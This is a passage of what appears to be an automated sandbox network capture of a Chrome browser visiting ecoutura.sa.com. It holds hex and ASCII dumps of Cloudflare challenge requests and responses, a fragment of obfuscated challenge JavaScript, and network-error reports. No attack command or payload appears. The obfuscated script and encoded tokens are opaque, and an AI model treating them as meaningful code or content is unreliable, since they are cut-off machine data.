                                                                                        Data Ascii: n n instanceof o},'WaTyf':function(n,o){return o!==n},'vynBk':gZ(1488),'BKcyR':function(n,o,s){return n(o,s)}},e[gZ(746)](d,Error)){if(e[gZ(637)](e[gZ(616)],gZ(1488))){for(o=gZ(434)[gZ(1153)]('|'),s=0;!![];){switch(o[s++]){case'0':B=j[gZ(351)](e[gZ(1222)]
                                                                                        2024-11-01 12:46:10 UTC1369INData Raw: 65 74 75 72 6e 20 73 3e 76 7d 2c 6a 5b 68 32 28 31 31 31 35 29 5d 3d 68 32 28 31 36 30 37 29 2c 6b 3d 6a 2c 6c 3d 65 5b 68 32 28 34 37 32 29 5d 28 29 2c 6d 3d 68 32 28 33 36 31 29 2c 6b 5b 68 32 28 31 34 34 31 29 5d 28 6c 5b 68 32 28 31 30 31 31 29 5d 28 6d 29 2c 2d 31 29 29 3f 65 4d 5b 68 32 28 33 31 37 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 33 29 7b 68 33 3d 68 32 2c 65 4d 5b 68 33 28 31 36 36 37 29 5d 28 29 7d 2c 31 65 33 29 3a 68 32 28 31 35 33 32 29 21 3d 3d 68 32 28 36 30 38 29 3f 28 6e 3d 7b 7d 2c 6e 5b 68 32 28 39 38 33 29 5d 3d 65 2c 6e 5b 68 32 28 31 36 32 37 29 5d 3d 66 2c 6e 5b 68 32 28 39 30 38 29 5d 3d 67 2c 6e 5b 68 32 28 31 37 30 32 29 5d 3d 68 2c 6e 5b 68 32 28 34 34 38 29 5d 3d 69 2c 6f 3d 6e 2c 65 4d 5b 68 32 28 33 31 37 29 5d 28 66 75
                                                                                        Data Ascii: eturn s>v},j[h2(1115)]=h2(1607),k=j,l=e[h2(472)](),m=h2(361),k[h2(1441)](l[h2(1011)](m),-1))?eM[h2(317)](function(h3){h3=h2,eM[h3(1667)]()},1e3):h2(1532)!==h2(608)?(n={},n[h2(983)]=e,n[h2(1627)]=f,n[h2(908)]=g,n[h2(1702)]=h,n[h2(448)]=i,o=n,eM[h2(317)](fu


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        14192.168.2.449761104.18.95.414435772C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:10 UTC1150OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1024805803:1730463054:b1rgIEdpWeHxmQJHck6RV8EmMMFOLeJcpMeBvebYgsc/8dbbfc65ff9e6b31/YskjOMlt.092AVHG.UE3lCUdd4zGhRJt1uSalhQrUMU-1730465168-1.1.1.1-yGD2l9ovY9dDpnf_eBS_OXrkjwGpYqg3WZZgwfmyKhkt414YGGj1tgkl1n9lqZ89 HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        Content-Length: 3359
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        Content-type: application/x-www-form-urlencoded
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        CF-Challenge: YskjOMlt.092AVHG.UE3lCUdd4zGhRJt1uSalhQrUMU-1730465168-1.1.1.1-yGD2l9ovY9dDpnf_eBS_OXrkjwGpYqg3WZZgwfmyKhkt414YGGj1tgkl1n9lqZ89
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Origin: https://challenges.cloudflare.com
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ndzua/0x4AAAAAAAymN2-m7RRX_jxe/auto/fbE/normal/auto/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-11-01 12:46:10 UTC3359OUTData Raw: 76 5f 38 64 62 62 66 63 36 35 66 66 39 65 36 62 33 31 3d 41 6a 55 39 30 39 6e 39 63 39 57 39 6c 39 54 58 7a 4c 58 7a 30 74 4f 30 4f 45 46 72 4f 46 7a 4f 74 64 45 56 6a 32 7a 65 64 7a 52 74 52 56 50 55 4f 69 52 64 42 38 6e 7a 56 36 31 39 7a 30 76 33 4e 7a 50 51 32 4f 75 7a 57 74 46 45 47 38 49 7a 46 4e 7a 53 32 4f 65 6e 52 7a 63 30 7a 59 42 71 39 4f 68 7a 42 55 4f 4a 7a 39 52 30 25 32 62 63 7a 35 32 7a 73 7a 42 6b 5a 59 6c 39 63 74 41 79 49 49 5a 79 44 7a 42 57 7a 4f 2b 51 36 4f 31 32 55 64 7a 4f 6f 6a 53 45 36 73 63 41 79 43 65 6d 30 57 65 75 30 2b 55 35 6d 7a 66 51 51 7a 65 49 38 50 78 46 55 7a 70 58 39 44 7a 57 6a 7a 56 39 7a 65 66 62 6d 63 7a 63 54 65 4e 75 55 74 7a 61 59 6e 74 39 4f 5a 79 47 51 74 7a 41 42 72 4e 78 4e 2d 58 5a 6e 6e 6d 6d 52 43 71 52
                                                                                        Data Ascii: v_8dbbfc65ff9e6b31=AjU909n9c9W9l9TXzLXz0tO0OEFrOFzOtdEVj2zedzRtRVPUOiRdB8nzV619z0v3NzPQ2OuzWtFEG8IzFNzS2OenRzc0zYBq9OhzBUOJz9R0%2bcz52zszBkZYl9ctAyIIZyDzBWzO+Q6O12UdzOojSE6scAyCem0Weu0+U5mzfQQzeI8PxFUzpX9DzWjzV9zefbmczcTeNuUtzaYnt9OZyGQtzABrNxN-XZnnmmRCqR
                                                                                        2024-11-01 12:46:10 UTC747INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:10 GMT
                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                        Content-Length: 149760
                                                                                        Connection: close
                                                                                        cf-chl-gen: B+bx0yu+HxAENxAeis6/d1qipFfujx3ae20JCCItynBYvbXge8Sw8QkhAgID/ulCpu3BEH5mHLpjFR9olU0OhibiWekLi8W258OY+p4TkxIDlo0AUntAm4SZ/yq9KAspkd4JbEUDJOXSw6kqNGI8hibOqwC+V5C6Crz8FW9vwAC74knaCZ5ttEmojZPKK0nMXY4fAvWXRy1vyY/z1rSlfScvAkDipOagcTLLFo3j4E1om8+3bnk2JXz30RfuwOXnWBvRB6AvvvaUfg0Q0jOQiHztSVz/ZWXMhYDscLSYYcIQCyuJSBT7qrvbnhmQMBETL500dPOuxIJR1sy+cKVVfsnGnKn6C/VQowJIwUgoHl1gQ/WEeZRT1357V1N86PMM642nDoICsQcRzGvFwuzAMqi2+sV1D+lWeRI9VhHckbCSiwbS7I/5tWLMXFGpADALFb80sl/kkQzd06jf78rBsM0fujmaGZOrXyaga+4t+7Q0zz8=$FAst7wtnj/WUtV+U
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8dbbfc733ebd6b2b-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-11-01 12:46:10 UTC622INData Raw: 68 6f 53 4e 6d 57 35 7a 6d 35 74 65 64 6e 61 55 6a 58 71 41 6a 34 56 33 5a 71 61 4d 5a 71 32 4c 70 58 43 47 63 70 36 75 6e 71 78 76 69 37 75 55 66 48 65 6f 6e 72 6d 58 6e 35 65 57 74 4c 79 6e 73 5a 2b 33 68 4c 32 5a 71 61 6d 47 76 38 2b 4e 72 64 61 51 71 36 47 7a 6c 5a 71 32 33 4c 53 32 71 5a 2f 68 74 39 62 50 6e 4d 44 6a 76 65 61 69 37 4b 7a 58 78 75 7a 6e 33 72 48 50 78 61 6a 70 39 73 79 7a 37 66 72 51 36 67 48 33 31 4e 33 61 42 63 44 79 78 4f 50 5a 36 4f 55 48 42 74 6a 72 32 67 67 41 33 4f 2f 6c 37 64 38 55 37 50 6e 7a 47 50 44 30 33 42 6e 75 38 68 33 32 47 50 67 66 42 52 63 71 46 39 34 6f 43 75 30 76 4c 41 34 42 4a 77 34 6f 41 69 55 4a 37 41 51 6f 48 52 44 31 49 76 73 2b 41 54 51 61 52 43 67 31 4e 54 64 4b 53 77 52 46 4a 52 30 45 52 79 30 6a 4a 44 45
                                                                                        Data Ascii: hoSNmW5zm5tednaUjXqAj4V3ZqaMZq2LpXCGcp6unqxvi7uUfHeonrmXn5eWtLynsZ+3hL2ZqamGv8+NrdaQq6GzlZq23LS2qZ/ht9bPnMDjveai7KzXxuzn3rHPxajp9syz7frQ6gH31N3aBcDyxOPZ6OUHBtjr2ggA3O/l7d8U7PnzGPD03Bnu8h32GPgfBRcqF94oCu0vLA4BJw4oAiUJ7AQoHRD1Ivs+ATQaRCg1NTdKSwRFJR0ERy0jJDE
                                                                                        2024-11-01 12:46:10 UTC1369INData Raw: 45 74 4a 31 39 46 54 44 78 52 59 47 4a 79 51 6e 63 72 4d 55 39 70 55 33 78 6f 53 30 32 43 51 6e 79 42 67 6b 46 79 65 6e 6c 2f 66 59 47 4b 6a 31 69 41 68 31 4a 6e 55 58 65 45 63 49 68 61 64 70 46 70 5a 33 64 64 58 46 78 2b 6b 4b 4f 50 6d 4b 56 2b 6c 5a 39 6c 69 71 65 42 5a 37 47 65 71 62 57 4b 71 5a 46 32 72 36 61 78 6a 58 79 4b 6c 6e 75 38 6f 49 36 52 6a 5a 71 2f 6e 35 47 79 74 73 62 4a 76 34 61 75 79 5a 48 54 71 63 53 66 6e 36 79 77 6f 35 47 53 30 36 2b 78 79 4c 7a 63 74 72 4f 63 73 64 2b 65 78 73 6d 30 78 2b 79 6e 6f 63 76 74 38 4b 79 76 78 73 44 79 30 4c 4b 73 38 64 33 73 37 63 2f 52 36 66 4c 57 2f 50 59 46 30 2f 37 33 35 75 45 44 31 73 33 5a 42 38 50 6d 35 51 33 4c 45 65 6b 52 32 42 58 74 46 64 30 5a 38 52 6e 65 48 66 55 64 34 79 48 35 49 76 6b 64 34
                                                                                        Data Ascii: EtJ19FTDxRYGJyQncrMU9pU3xoS02CQnyBgkFyenl/fYGKj1iAh1JnUXeEcIhadpFpZ3ddXFx+kKOPmKV+lZ9liqeBZ7GeqbWKqZF2r6axjXyKlnu8oI6RjZq/n5GytsbJv4auyZHTqcSfn6ywo5GS06+xyLzctrOcsd+exsm0x+ynocvt8KyvxsDy0LKs8d3s7c/R6fLW/PYF0/735uED1s3ZB8Pm5Q3LEekR2BXtFd0Z8RneHfUd4yH5Ivkd4
                                                                                        2024-11-01 12:46:10 UTC1369INData Raw: 76 59 57 59 30 55 45 52 4a 64 7a 68 6e 4f 32 38 78 54 30 46 62 4f 6b 35 32 55 6e 5a 70 56 46 64 56 58 45 52 67 5a 6f 6d 4d 57 6d 65 4d 66 55 31 74 6b 56 64 5a 5a 5a 4e 74 61 6c 56 32 65 48 4b 63 6a 49 32 61 57 5a 75 5a 66 36 56 71 5a 34 46 6c 67 5a 36 42 73 59 32 79 73 32 39 33 6b 4b 64 33 65 4a 52 30 76 34 2b 59 65 4d 4f 50 6e 48 7a 47 78 61 43 41 79 73 57 6b 68 4d 36 4b 71 49 6a 53 31 5a 36 4e 70 4b 61 75 31 61 54 50 6c 61 2b 59 30 64 53 37 30 74 71 79 73 4e 44 62 76 64 4c 61 78 4e 75 2b 33 4d 48 53 34 36 6e 47 7a 75 4c 6d 77 38 66 6e 38 63 37 52 33 66 54 56 31 38 4c 35 2f 4e 44 79 34 65 63 48 31 38 50 59 79 2b 66 62 42 4f 4d 4b 42 75 67 4b 43 75 7a 58 47 76 44 33 47 52 62 2b 44 74 67 52 2b 41 58 34 46 41 62 6a 34 53 59 68 46 42 30 67 4b 43 6f 68 4c 53
                                                                                        Data Ascii: vYWY0UERJdzhnO28xT0FbOk52UnZpVFdVXERgZomMWmeMfU1tkVdZZZNtalV2eHKcjI2aWZuZf6VqZ4FlgZ6BsY2ys293kKd3eJR0v4+YeMOPnHzGxaCAysWkhM6KqIjS1Z6NpKau1aTPla+Y0dS70tqysNDbvdLaxNu+3MHS46nGzuLmw8fn8c7R3fTV18L5/NDy4ecH18PYy+fbBOMKBugKCuzXGvD3GRb+DtgR+AX4FAbj4SYhFB0gKCohLS
                                                                                        2024-11-01 12:46:10 UTC1369INData Raw: 4f 55 56 79 50 56 4a 52 65 44 35 38 56 58 78 44 67 46 6d 42 57 58 78 42 59 6d 52 65 69 48 68 35 68 6b 57 48 68 57 75 52 56 57 2b 4c 66 49 70 64 61 70 35 70 6b 70 56 64 6b 5a 70 78 70 32 56 66 69 57 70 34 71 6f 56 68 65 57 79 6c 6e 61 70 75 74 36 4f 47 68 6e 56 30 64 36 6d 4b 76 72 61 41 74 48 39 32 70 49 2b 67 6b 70 6d 6c 75 59 61 46 6d 4b 65 67 6f 64 48 50 30 4c 2b 74 70 35 61 30 73 4a 47 57 79 4c 4b 57 33 37 6a 55 34 4c 66 59 77 4c 6a 46 6f 2b 71 2f 77 5a 2b 72 36 64 75 39 36 4d 36 6d 39 62 54 4d 39 64 53 36 79 63 33 36 33 64 72 66 2f 75 72 4e 77 76 7a 42 75 66 6e 2b 78 4e 33 6b 34 4d 6a 65 79 4f 6f 46 30 52 44 56 34 50 50 69 46 65 33 61 38 63 38 41 2f 66 55 4d 41 50 41 6c 33 41 58 68 45 69 4d 4a 48 67 30 4f 43 50 63 45 44 2f 77 48 4c 53 34 31 42 43 38
                                                                                        Data Ascii: OUVyPVJReD58VXxDgFmBWXxBYmReiHh5hkWHhWuRVW+LfIpdap5pkpVdkZpxp2VfiWp4qoVheWylnaput6OGhnV0d6mKvraAtH92pI+gkpmluYaFmKegodHP0L+tp5a0sJGWyLKW37jU4LfYwLjFo+q/wZ+r6du96M6m9bTM9dS6yc363drf/urNwvzBufn+xN3k4MjeyOoF0RDV4PPiFe3a8c8A/fUMAPAl3AXhEiMJHg0OCPcED/wHLS41BC8
                                                                                        2024-11-01 12:46:10 UTC1369INData Raw: 6b 42 7a 66 6c 68 44 50 48 49 2f 69 6d 56 58 58 58 70 4e 69 32 31 68 68 58 4b 42 5a 5a 65 49 61 35 47 5a 55 6e 61 4d 64 56 31 7a 6d 31 74 6a 65 31 79 47 6d 32 69 55 66 35 64 73 6f 34 4b 62 68 32 74 37 6f 4a 4b 72 67 48 65 33 65 5a 61 63 6b 6e 75 72 6c 37 4f 4a 75 35 31 36 6b 4c 4f 37 70 62 71 70 6d 4a 79 64 79 5a 7a 4c 69 6f 2b 4c 79 36 4f 6b 6f 37 43 6a 6b 72 50 4d 6d 74 62 5a 71 62 4f 77 35 4c 72 6d 77 73 57 34 6f 72 6d 32 78 64 33 66 35 61 2b 36 33 75 6e 64 70 2b 48 77 78 71 2f 56 7a 76 44 64 7a 73 7a 6f 32 2f 7a 74 34 76 77 42 33 4d 44 6b 42 77 73 48 31 65 34 51 38 41 76 38 33 51 73 4e 35 65 62 50 7a 78 4c 33 38 41 66 6e 31 39 63 68 48 53 49 55 38 2f 55 54 38 2f 30 70 49 41 34 75 45 41 77 6c 4c 68 37 79 4a 67 30 33 43 6a 49 36 47 52 6e 30 4e 42 6b 62
                                                                                        Data Ascii: kBzflhDPHI/imVXXXpNi21hhXKBZZeIa5GZUnaMdV1zm1tje1yGm2iUf5dso4Kbh2t7oJKrgHe3eZacknurl7OJu516kLO7pbqpmJydyZzLio+Ly6Oko7CjkrPMmtbZqbOw5LrmwsW4orm2xd3f5a+63undp+Hwxq/VzvDdzszo2/zt4vwB3MDkBwsH1e4Q8Av83QsN5ebPzxL38Afn19chHSIU8/UT8/0pIA4uEAwlLh7yJg03CjI6GRn0NBkb
                                                                                        2024-11-01 12:46:10 UTC1369INData Raw: 78 5a 66 33 5a 2f 69 46 57 4f 68 34 43 53 6a 45 70 55 68 57 75 47 6a 6f 4a 58 65 57 78 57 6e 35 78 5a 66 4a 4f 66 65 6f 53 58 66 5a 4b 41 66 57 6c 73 6d 71 75 66 62 32 64 74 6b 33 52 72 72 49 4e 75 62 34 68 36 63 6e 4f 4d 75 58 5a 33 6b 61 79 7a 78 61 42 2b 6e 4c 71 72 68 37 79 33 6f 71 50 49 73 49 32 6a 6f 38 47 6e 6b 71 69 74 32 61 72 55 73 73 76 55 74 37 43 37 74 62 69 30 35 63 50 6f 74 65 71 70 32 4b 61 6c 75 73 50 70 33 39 37 51 30 76 50 4c 74 2b 72 55 30 63 6a 6d 73 4f 33 71 33 66 79 35 75 38 50 69 43 63 4c 48 78 4f 62 70 34 65 6a 38 44 52 4c 76 45 67 50 71 38 2b 37 54 45 4f 2f 31 47 66 76 2b 37 78 33 77 44 68 6e 73 42 76 63 6f 35 52 49 6e 2f 42 63 67 4b 6a 45 41 49 4f 6f 69 36 77 6b 4e 49 2f 54 79 2b 66 58 32 39 44 73 31 2f 51 38 74 4a 50 30 53 48
                                                                                        Data Ascii: xZf3Z/iFWOh4CSjEpUhWuGjoJXeWxWn5xZfJOfeoSXfZKAfWlsmqufb2dtk3RrrINub4h6cnOMuXZ3kayzxaB+nLqrh7y3oqPIsI2jo8Gnkqit2arUssvUt7C7tbi05cPoteqp2KalusPp397Q0vPLt+rU0cjmsO3q3fy5u8PiCcLHxObp4ej8DRLvEgPq8+7TEO/1Gfv+7x3wDhnsBvco5RIn/BcgKjEAIOoi6wkNI/Ty+fX29Ds1/Q8tJP0SH
                                                                                        2024-11-01 12:46:10 UTC1369INData Raw: 71 5a 33 78 70 62 49 36 42 6c 57 46 66 54 6f 68 4d 59 31 5a 57 55 49 31 67 57 6f 31 7a 65 6e 6c 32 69 4b 64 34 66 57 6d 4b 65 36 69 58 6a 70 39 2f 5a 5a 47 76 68 72 4a 79 6c 58 6d 6d 6a 36 6c 37 76 36 79 4c 6a 5a 57 56 74 4c 47 39 65 71 43 31 77 63 69 62 6f 73 57 64 69 4d 4f 4f 6c 49 37 47 6b 72 6d 4c 74 74 48 54 33 63 79 2b 75 4f 48 4f 77 39 76 6c 31 4d 62 42 6d 39 57 6c 78 72 58 65 35 72 72 49 33 63 4f 2b 78 2b 6a 4c 34 38 6e 37 77 39 6e 56 32 51 48 55 75 74 77 43 38 64 44 68 31 2f 79 37 77 63 4c 48 7a 51 6a 4e 36 51 76 4c 30 41 48 32 37 41 6a 77 36 66 51 59 47 75 38 57 35 39 49 65 2f 67 44 38 33 4e 7a 6b 45 69 58 31 42 68 34 58 47 2f 63 4d 42 42 45 44 4b 43 4d 6b 38 68 49 46 46 77 77 4a 2b 68 73 62 2b 67 77 5a 45 2f 73 63 4d 30 6b 35 48 52 63 55 47 67
                                                                                        Data Ascii: qZ3xpbI6BlWFfTohMY1ZWUI1gWo1zenl2iKd4fWmKe6iXjp9/ZZGvhrJylXmmj6l7v6yLjZWVtLG9eqC1wcibosWdiMOOlI7GkrmLttHT3cy+uOHOw9vl1MbBm9WlxrXe5rrI3cO+x+jL48n7w9nV2QHUutwC8dDh1/y7wcLHzQjN6QvL0AH27Ajw6fQYGu8W59Ie/gD83NzkEiX1Bh4XG/cMBBEDKCMk8hIFFwwJ+hsb+gwZE/scM0k5HRcUGg
                                                                                        2024-11-01 12:46:10 UTC1369INData Raw: 63 6c 56 52 55 30 39 75 6e 4a 65 63 6e 6d 78 71 63 4a 69 61 6a 4b 53 6a 6b 49 4b 6e 64 59 4f 46 62 59 57 77 69 58 36 6b 65 36 57 42 6b 34 57 52 6c 36 64 31 73 37 4b 75 65 70 47 36 75 58 71 77 6d 33 33 49 77 70 65 45 70 71 47 68 70 49 32 66 7a 61 79 46 6a 4a 47 4f 79 73 36 59 74 4a 4b 73 71 70 71 66 74 71 37 4b 78 4f 47 67 7a 71 66 66 74 37 69 33 78 4c 65 6d 78 2b 43 75 36 75 32 39 78 38 53 76 77 2f 48 45 30 4e 48 2b 79 62 7a 53 75 76 62 36 41 76 7a 6d 2b 50 48 66 2f 67 58 70 44 4e 66 76 35 67 44 6d 30 51 44 30 33 75 50 30 39 78 49 4d 44 2b 7a 33 49 42 62 30 48 76 66 35 46 43 44 36 2f 50 6b 4a 33 53 59 69 37 75 45 4b 2b 77 66 2b 4d 43 66 77 39 51 6f 59 4a 7a 45 33 4e 54 55 35 49 68 67 30 4e 76 59 78 46 67 6a 36 42 44 34 70 4c 45 52 4f 49 6a 45 77 51 30 68
                                                                                        Data Ascii: clVRU09unJecnmxqcJiajKSjkIKndYOFbYWwiX6ke6WBk4WRl6d1s7KuepG6uXqwm33IwpeEpqGhpI2fzayFjJGOys6YtJKsqpqftq7KxOGgzqfft7i3xLemx+Cu6u29x8Svw/HE0NH+ybzSuvb6Avzm+PHf/gXpDNfv5gDm0QD03uP09xIMD+z3IBb0Hvf5FCD6/PkJ3SYi7uEK+wf+MCfw9QoYJzE3NTU5Ihg0NvYxFgj6BD4pLEROIjEwQ0h
                                                                                        2024-11-01 12:46:10 UTC1369INData Raw: 70 57 47 68 6f 74 77 57 71 4f 56 68 48 35 65 59 4b 47 4b 69 4a 64 32 6a 70 39 2b 62 58 75 65 73 6d 71 70 6b 34 57 4e 73 5a 4b 5a 73 62 75 32 65 4c 75 68 71 35 47 45 66 71 57 37 78 38 4f 6f 76 35 57 35 78 49 6a 42 72 64 4b 77 77 38 57 79 6b 61 33 56 77 73 2b 74 31 37 72 53 74 4e 37 44 77 4c 58 67 7a 72 53 39 35 64 4f 35 6f 2b 72 42 34 37 6e 52 30 75 66 76 36 4d 6e 55 34 2f 50 59 79 4e 4c 50 33 76 4c 76 34 65 50 33 33 66 58 5a 77 4e 44 2b 35 76 37 70 43 2f 34 50 2b 67 48 6b 37 50 51 4e 39 41 6a 55 41 75 77 62 37 50 66 78 45 68 7a 72 2b 41 55 65 38 51 2f 32 35 77 49 48 33 66 7a 6d 41 43 45 4b 49 68 33 73 4a 50 49 56 43 42 41 56 4a 50 49 51 39 76 63 37 50 44 6e 39 4e 53 34 63 2f 54 42 45 41 77 54 39 4e 77 31 43 41 68 45 70 53 42 41 56 43 42 55 57 47 55 6b 6d
                                                                                        Data Ascii: pWGhotwWqOVhH5eYKGKiJd2jp9+bXuesmqpk4WNsZKZsbu2eLuhq5GEfqW7x8Oov5W5xIjBrdKww8Wyka3Vws+t17rStN7DwLXgzrS95dO5o+rB47nR0ufv6MnU4/PYyNLP3vLv4eP33fXZwND+5v7pC/4P+gHk7PQN9AjUAuwb7PfxEhzr+AUe8Q/25wIH3fzmACEKIh3sJPIVCBAVJPIQ9vc7PDn9NS4c/TBEAwT9Nw1CAhEpSBAVCBUWGUkm


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        15192.168.2.44976235.190.80.14435772C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:10 UTC534OUTOPTIONS /report/v4?s=0uYyuOXxMuQ1gvbJJVzRhKKVQMUdjh5eiiYnszarNXl9voZneT9WEzAd3OwoHaoaW%2FCazykFRb72kgT8pIxcvEwGSHHUUpy3W9lquW%2FSonCyXsutrWYTgkqvGdFu52LLCgU%3D HTTP/1.1
                                                                                        Host: a.nel.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        Origin: https://ecoutura.sa.com
                                                                                        Access-Control-Request-Method: POST
                                                                                        Access-Control-Request-Headers: content-type
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-11-01 12:46:10 UTC336INHTTP/1.1 200 OK
                                                                                        Content-Length: 0
                                                                                        access-control-max-age: 86400
                                                                                        access-control-allow-methods: OPTIONS, POST
                                                                                        access-control-allow-origin: *
                                                                                        access-control-allow-headers: content-type, content-length
                                                                                        date: Fri, 01 Nov 2024 12:46:10 GMT
                                                                                        Via: 1.1 google
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        16192.168.2.44976435.190.80.14435772C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:11 UTC476OUTPOST /report/v4?s=0uYyuOXxMuQ1gvbJJVzRhKKVQMUdjh5eiiYnszarNXl9voZneT9WEzAd3OwoHaoaW%2FCazykFRb72kgT8pIxcvEwGSHHUUpy3W9lquW%2FSonCyXsutrWYTgkqvGdFu52LLCgU%3D HTTP/1.1
                                                                                        Host: a.nel.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        Content-Length: 424
                                                                                        Content-Type: application/reports+json
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-11-01 12:46:11 UTC424OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 37 39 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 65 63 6f 75 74 75 72 61 2e 73 61 2e 63 6f 6d 2f 39 6f 39 33 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 37 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72
                                                                                        Data Ascii: [{"age":0,"body":{"elapsed_time":379,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://ecoutura.sa.com/9o93/","sampling_fraction":1.0,"server_ip":"188.114.97.3","status_code":404,"type":"http.error"},"type":"network-error","ur
                                                                                        2024-11-01 12:46:11 UTC168INHTTP/1.1 200 OK
                                                                                        Content-Length: 0
                                                                                        date: Fri, 01 Nov 2024 12:46:11 GMT
                                                                                        Via: 1.1 google
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        17192.168.2.449766104.18.95.414435772C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:13 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1024805803:1730463054:b1rgIEdpWeHxmQJHck6RV8EmMMFOLeJcpMeBvebYgsc/8dbbfc65ff9e6b31/YskjOMlt.092AVHG.UE3lCUdd4zGhRJt1uSalhQrUMU-1730465168-1.1.1.1-yGD2l9ovY9dDpnf_eBS_OXrkjwGpYqg3WZZgwfmyKhkt414YGGj1tgkl1n9lqZ89 HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-11-01 12:46:13 UTC379INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 01 Nov 2024 12:46:13 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 7
                                                                                        Connection: close
                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                        cf-chl-out: 8hZDSENL9VZVSsvXrerpSr5Exu8GoNuJVXs=$2EkXFoGP1oUj2dBQ
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8dbbfc874ead6bae-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-11-01 12:46:13 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                        Data Ascii: invalid


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        18192.168.2.449765104.18.95.414435772C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:13 UTC814OUTGET /cdn-cgi/challenge-platform/h/b/pat/8dbbfc65ff9e6b31/1730465170458/acbb53e218aec4a036a5867779de4914a70d4321a24be75c0101110a335ab166/FGnjkYIDdV7w3fL HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        Cache-Control: max-age=0
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
